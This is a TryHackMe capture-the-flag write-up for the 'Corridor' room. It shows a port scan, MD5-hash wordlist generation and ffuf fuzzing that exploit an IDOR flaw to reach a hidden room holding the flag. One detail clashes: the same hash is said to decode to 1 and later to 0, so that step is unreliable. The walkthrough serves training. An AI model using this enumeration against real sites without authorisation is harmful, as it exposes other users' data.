Skip to Content
WriteupsTryHackMeCorridor

Corridor - THM

This is the writeup for the TryHackMe easy difficulty room called Corridor .

Task

From the task we can already see that we are going to deal with an IDOR vulnerability.

Recon

CMD: nmap -sS -sV -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-30 19:38 CEST Nmap scan report for 10.10.16.117 Host is up (0.040s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Werkzeug httpd 2.0.3 (Python 3.10.2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.85 seconds

The nmap scan shows that there is a webserver running on port 80. Let’s visit the webpage.

Webpage

On the website we can click on any door to enter a “room”. There is nothing just an empty room behind each door.

Empty Room

The task mentioned that we should look for an IDOR vulnerability so analyzing the URL is a good start.

http://$IP/cfcd208495d565ef66e7dff9f98764da

We notice that the path looks oddly like a hash more precisely an MD5 hash. So let’s try to crack it using CrackStation .

Crack

Exploitation

The cracked hash is “1” so from now on we can assume that there are more MD5 hashes in the URL that represent room numbers. By making a wordlist which contains numbers from 0 to 100 and hashing them with MD5 we can fuzz the website for hidden rooms.

CMD: crunch 0 2 0123456789 > numbers.txt
CMD: while IFS= read -r line; do echo -n "$line" | md5sum | awk '{print $1}'; done < numbers.txt > hashed

I’m using fuff to do the fuzzing.

CMD: ffuf -w hashed -u http://$IP/FUZZ -v /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.16.117/FUZZ :: Wordlist : FUZZ: /home/themaster/SEC/Rooms/Corridor/hashed :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ ... [Status: 200, Size: 797, Words: 121, Lines: 34, Duration: 168ms] | URL | http://10.10.16.117/cfcd208495d565ef66e7dff9f98764da * FUZZ: cfcd208495d565ef66e7dff9f98764da ...

The MD5 hashed number 0 which is cfcd208495d565ef66e7dff9f98764da is a vaild room we haven’t visited before. Visiting the room reveals the FLAG.

Flag

Last updated on